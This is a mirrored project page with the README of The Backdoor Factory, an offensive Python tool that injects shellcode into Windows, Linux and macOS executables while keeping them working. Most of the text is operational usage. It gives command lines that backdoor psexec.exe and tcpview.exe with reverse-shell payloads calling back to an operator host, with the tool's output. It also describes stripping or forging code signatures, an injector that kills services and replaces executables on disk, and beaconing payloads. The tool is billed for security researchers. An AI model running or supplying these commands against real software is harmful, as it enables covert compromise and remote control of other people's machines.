Arduino>> the-backdoor-factory>> 返回
项目作者: secretsquirrel

项目描述 :
Patch PE, ELF, Mach-O binaries with shellcode new version in development, available only to sponsors
高级语言: Python
项目地址: git://github.com/secretsquirrel/the-backdoor-factory.git
创建时间: 2013-05-30T01:04:24Z
项目社区:https://github.com/secretsquirrel/the-backdoor-factory
开源协议:BSD 3-Clause "New" or "Revised" License
下载


The new version of BACKDOOR FACTORY is available! Get access here: https://github.com/sponsors/secretsquirrel

WARNING: Pull Requests WILL BE IGNORED AND CLOSED.

The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Join the chat at https://gitter.im/secretsquirrel/the-backdoor-factory Black Hat Arsenal

Black Hat USA 2015:

  1. Video: https://www.youtube.com/watch?v=OuyLzkG16Uk
  3. Paper: https://www.blackhat.com/docs/us-15/materials/us-15-Pitts-Repurposing-OnionDuke-A-Single-Case-Study-Around-Reusing-Nation-State-Malware-wp.pdf

Shmoocon 2015:

  1. Video: https://archive.org/details/joshpitts_shmoocon2015
  3. Paper: https://www.dropbox.com/s/te7e35c8xcnyfzb/JoshPitts-UserlandPersistenceOnMacOSX.pdf

DerbyCon 2014: 

  1. Video: http://www.youtube.com/watch?v=LjUN9MACaTs

DerbyCon 2013: 

  1. Video: http://www.youtube.com/watch?v=jXLb2RNX5xs
  3. Injection Module Demo: http://www.youtube.com/watch?v=04aJAex2o3U
  5. Slides: http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory

Contact the developer on:

  1. IRC:
  2. irc.freenode.net #BDFactory 
  4. Twitter:
  5. @midnite_runr

Under a BSD 3 Clause License

See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki

Installing

DOCKER

  1. docker pull secretsquirrel/the-backdoor-factory
  2. docker run -it secretsquirrel/the-backdoor-factory bash
  3. # ./backdoor.py

OLD SCHOOL

Dependences

To use OnionDuke you MUST be on an intel machine because aPLib has no support for the ARM chipset yet.

Capstone engine can be installed from PyPi with:

  1. sudo pip install capstone

Pefile, most recent:

  1. https://code.google.com/p/pefile/

osslsigncode (included in repo): 

  1. http://sourceforge.net/p/osslsigncode/osslsigncode/ci/master/tree/

Kali Install:

  1.   apt-get update
  2.   apt-get install backdoor-factory

Other *NIX/MAC INSTALL:

  1. ./install.sh

This will install Capstone with 3.01 pip to install pefile.

UPDATE:

  1. ./update.sh

Supporting: 

  1. Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), 
  2. and Mach-O x86/x64 and those formats in FAT files
  4. Packed Files: PE UPX x86/x64
  6. Experimental: OpenBSD x32

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I’m on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

  1. Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
  2. Without him, I would still be trying to do stupid things 
  3. with the elf format.
  4. Also thanks to Silvio Cesare with his 1998 paper 
  5. (http://vxheaven.org/lib/vsc01.html) which these ELF patching
  6. techniques are based on.

Recently tested on many binaries.

./backdoor.py -h
Usage: backdoor.py [options]

Features:

PE Files

  1. Can find all codecaves in an EXE/DLL.
  2. By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
  3. Can inject shellcode into code caves or into a new section.
  4. Can find if a PE binary needs to run with elevated privileges.
  5. When selecting code caves, you can use the following commands:
  6.   -Jump (j), for code cave jumping
  7.   -Single (s), for patching all your shellcode into one cave
  8.   -Append (a), for creating a code cave
  9.   -Ignore (i or q), nevermind, ignore this binary
  10. Can ignore DLLs
  11. Import Table Patching
  12. AutoPatching (-m automtic)
  13. Onionduke (-m onionduke)

ELF Files

  1. Extends 1000 bytes (in bytes) to the TEXT SEGMENT and injects shellcode into that section of code.

Mach-O Files

  1. Pre-Text Section patching and signature removal

Overall

  1. The user can :
  2.   -Provide custom shellcode.
  3.   -Patch a directory of executables/dlls.
  4.   -Select x32 or x64 binaries to patch only.
  5.   -Include BDF is other python projects see pebin.py and elfbin.py

Sample Usage:

Patch an exe/dll using an existing code cave:

  1. ./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 
  3. [*] In the backdoor module
  4. [*] Checking if binary is supported
  5. [*] Gathering file info
  6. [*] Reading win32 entry instructions
  7. [*] Looking for and setting selected shellcode
  8. [*] Creating win32 resume execution stub
  9. [*] Looking for caves that will fit the minimum shellcode length of 402
  10. [*] All caves lengths:  (402,)
  11. ############################################################
  12. The following caves can be used to inject code and possibly
  13. continue execution.
  14. **Don't like what you see? Use jump, single, append, or ignore.**
  15. ############################################################
  16. [*] Cave 1 length as int: 402
  17. [*] Available caves:
  18. 1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
  19. 2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
  20. 3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
  21. 4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
  22. 5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
  23. 6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
  24. 7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
  25. 8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
  26. 9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
  27. 10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
  28. **************************************************
  29. [!] Enter your selection: 5
  30. Using selection: 5
  31. [*] Changing Section Flags
  32. [*] Patching initial entry instructions
  33. [*] Creating win32 resume execution stub
  34. [*] Overwriting certificate table pointer
  35. [*] psexec.exe backdooring complete
  36. File psexec.exe is in the 'backdoored' directory

Patch an exe/dll by adding a code section:

  1. ./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
  2. [*] In the backdoor module
  3. [*] Checking if binary is supported
  4. [*] Gathering file info
  5. [*] Reading win32 entry instructions
  6. [*] Looking for and setting selected shellcode
  7. [*] Creating win32 resume execution stub
  8. [*] Creating Code Cave
  9. - Adding a new section to the exe/dll for shellcode injection
  10. [*] Patching initial entry instructions
  11. [*] Creating win32 resume execution stub
  12. [*] Overwriting certificate table pointer
  13. [*] psexec.exe backdooring complete
  14. File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

  1. ./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
  2. ...output too long for README...

User supplied shellcode:

  1. msfpayload windows/exec CMD='calc.exe' R > calc.bin
  2. ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
  3. This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

PEcodeSigning

BDF can sign PE files if you have a codesigning cert. It uses osslsigncode.
Put your signing cert and private key in the certs/ directory. Prep your certs using openssl commands from this blog post:
http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html

Put your private key password in a file (gasp) as so (exactly as so): 

  1. echo -n yourpassword > certs/passFile.txt

Name your certs EXACTLY as follows:

  1. signingCert.cer => certs/signingCert.cer
  2. signingPrivateKey.pem => certs/signingPrivateKey.pem

Your certs/ directory should look excatly as so:

  1. certs
  2. ├── passFile.txt
  3. ├── signingPrivateKey.pem
  4. └── signingCert.cer

Enable PE Code Signing with the -C flag as so:

  1.  ./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic -C

On successful run you should see this line in BDF output:

  1. [*] Code Signing Succeeded

Hunt and backdoor: Injector | Windows Only

  1. The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
  2. Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.
  4. ./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Changelog

01/11/2016

  • Fix entry point truncation bug that led to improper recovery in rare instances

07/04/2016

  • Support for dynamic paths in BDFProxy for preprocessor

06/19/2016

  • Added the preprocessor and other optimizations
  • The preprocessor allows the user to modify the binary prior to payload injection
  • Invoke with the -p flag
  • See samples in ./preprocessor/

12/20/2015

  • Added directory paths to BDF to find certs directory.

12/18/2015

11/17/2015

  • Bug fix in rsrc section for onionduke patching and remove of random win32 version value in PE Header

11/13/2015

  • Added proper truncating of a PE file after signature pointer is cleared in PE header - e.g. proper unsigning. Resulting in better support for IAT patching

10/19/2015

  • Fixed bug in IAT directory cave assignment that caused BDF crash
  • Made the feature optional with -A flag

10/13/2015

  • Changed the Import Table Directory modifications from adding a new section to using an existing code cave

08/12/2015

  • Added ‘replace’ PATCH_METHOD - a straight PE copy pasta of the supplied binary

  • More for usage with BDFProxy

    Usage: ./backdoor.py -f weee.exe -m replace -b supplied_binary.exe

08/11/2015

  • Stability fix for auto cave selection for rare caves of overlap

08/05/2015

  • BH USA UPDATES, w00t!
  • OnionDuke, use -m onionduke
    • Supports user supplied exe’s and dll’s
    • Usage: ./backdoor.py -f originalfile.exe -m onionduke -b pentest.dll/exe
  • XP MODE = Prior IAT based payloads did not support XP, Wine, or Windows 98. If you need to support XP use the -X flag. I’m not supporting anything less than XP (and not XP x64).
  • Invoke UAC prompt to runas as admin. experimental - patches the PE manifest if requestedExecutionLevel exists.
  • Stability updates:
    • Fixed a bug with incorrect RVA calculation jmp’ing across 2+ code caves
    • Better checks to determine if a new section for the IAT will write into appended data and therefore fail
  • Speed Improvements:
    • Faster code cave finding while using automatic mode (-m automatic)
    • Faster rsrc parsing to find manifest file

5/01/2015

  • Bug fix to the reverse_tcp_stager_threaded payload when using single caves payload

4/28/2015

  • Adding check for Bound Imports (PE files with bound imports will not be patched)

4/14/2015

So many updates:

2/14/2015

I <3 you guys

  • Added Import Address Table patching for PEs to support iat_reverse_tcp payloads that
    use the import table for winAPI calls. If the binary you are patching does not
    have LoadLibraryA and GetProcAddress, for example, BDF will patch it in to a
    new Import Table in a new section. Supports x64/x86 PEs.

  • Added iat_reverse_tcp for x64 PEs.

  • Bug fixes and improvements

1/1/2015

Happy New Year!

Two new OS X payloads! The delay: delay_reverse_shell_tcp

-B 30 —> delay the payload for 30 seconds, main code runs right away.

Setting of firm capstone commit for building into BDF, capstone ‘Next’ repo
breaks BDF.

Fixes to support cython capstone implementation null byte truncation issue

12/27/2014

Added payloadtests.py

This script will output patched files in backdoored that will allow for the user to
test the payloads as they wish. Each payload type increments the port used
by one.

  1. Usage: payloadtest.py binary HOST PORT

12/17/2014

OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp

-B 15 —> set beacon time for 15 secs

Bug fix to support OS X for BDFProxy

10/11/2014

PE UPX Patching Added

9/26/2014

Mach-O x86/x64 added

x86 IAT payload optimization

7/31/2014

Added support for ARM x32 LE ELF patching

7/22/2014

Added FreeBSD x32 ELF patching support

Change to BSD 3 Clause License

7/13/2014

Incorporated Capstone: http://www.capstone-engine.org/

During the process of adding Capstone, I removed about 500 lines of code. That’s pretty awesome.

Renamed loadliba_reverse_tcp to iat_reverse_tcp.

Small optimizations for speed.

5/30/2014

Added a new win86 shellcode: loadliba_reverse_tcp